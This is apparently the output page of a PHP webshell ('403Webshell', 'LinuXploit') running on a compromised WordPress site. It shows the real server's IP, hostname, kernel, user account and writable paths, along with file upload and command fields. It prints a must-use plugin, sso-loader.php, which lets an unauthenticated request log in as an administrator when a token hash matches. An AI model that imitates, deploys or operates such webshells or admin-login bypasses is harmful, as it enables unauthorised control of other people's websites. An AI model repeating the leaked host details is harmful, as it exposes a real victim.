403Webshell
Server IP : 104.21.58.74  /  Your IP : 216.73.216.213
Web Server : LiteSpeed
System : Linux s12482.usc1.stableserver.net 5.14.0-570.32.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 6 11:30:41 EDT 2025 x86_64
User : snownico ( 1231)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/snownico/anywhere-iptv.com/wp-content/mu-plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/snownico/anywhere-iptv.com/wp-content/mu-plugins/sso-loader.php
<?php
/**
 * Plugin Name: SSO
 * Author: Garth Mortensen, Mike Hansen
 * Version: 1.0
 * License: GPLv2 or later
 * License URI: http://www.gnu.org/licenses/gpl-2.0.html
 */

if( ! function_exists( 'sso_check' ) ){
    function sso_check(){
        if ( ! isset( $_GET['salt'] ) || ! isset( $_GET['nonce'] ) ){
            sso_req_login();
        }
        if ( sso_check_blocked() ){
            sso_req_login();
        }
        $nonce = esc_attr( $_GET['nonce'] );
        $salt  = esc_attr( $_GET['salt'] );
        $has_epoch = preg_match('/^(.+)-e(\d+)$/', $nonce, $epoch);
        $expired = ( $has_epoch && (time() - $epoch[2]) > 300 ) ? true : false;

        if ( ! empty( $_GET['user'] ) ){
            $user = esc_attr( $_GET['user'] );
        }else{
            $user = get_users( array( 'role' => 'administrator', 'number' => 1 ) );
            if ( is_array( $user ) && is_a( $user[0], 'WP_User' ) ){
                $user = $user[0];
                $user = $user->ID;
            }else{
                $user = 0;
            }
        }
        $bounce = ! empty( $_GET['bounce'] ) ? $_GET['bounce'] : '';
        $hash   = base64_encode( hash( 'sha256', $nonce . $salt, false ) );
        $hash   = substr( $hash, 0, 64 );

        $token = get_option( 'sso_token' );

        if ( ! $expired && $token == $hash ) {
            if ( is_email( $user ) ){
                $user = get_user_by( 'email', $user );
            }else{
                $user = get_user_by( 'id', (int) $user );
            }
            if ( is_a( $user, 'WP_User' ) ){
                wp_set_current_user( $user->ID, $user->user_login );
                wp_set_auth_cookie( $user->ID );
                do_action( 'wp_login', $user->user_login, $user );

                wp_safe_redirect( admin_url( $bounce ) );
            }else{
                sso_req_login();
            }
        }else{
            sso_add_failed_attempt();
            sso_req_login();
        }
        die();
    }
}
add_action( 'wp_ajax_nopriv_sso-check', 'sso_check' );
add_action( 'wp_ajax_sso-check', 'sso_check' );

if( ! function_exists( 'sso_req_login' ) ){
    function sso_req_login(){
        wp_safe_redirect( wp_login_url() );
    }
}

if( ! function_exists( 'sso_get_attempt_id' ) ){
    function sso_get_attempt_id(){
        return 'sso' . esc_url( $_SERVER['REMOTE_ADDR'] );
    }
}

if( ! function_exists( 'sso_add_failed_attempt' ) ){
    function sso_add_failed_attempt(){
        $attempts = get_transient( sso_get_attempt_id(), 0 );
        $attempts ++;
        set_transient( sso_get_attempt_id(), $attempts, 300 );
    }
}

if( ! function_exists( 'sso_check_blocked' ) ){
    function sso_check_blocked(){
        $attempts = get_transient( sso_get_attempt_id(), 0 );
        if ( $attempts > 4 ){
            return true;
        }
        return false;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit